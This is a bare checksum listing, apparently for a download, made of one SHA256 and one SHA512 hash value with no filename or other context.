SHA256a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d
SHA5129e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627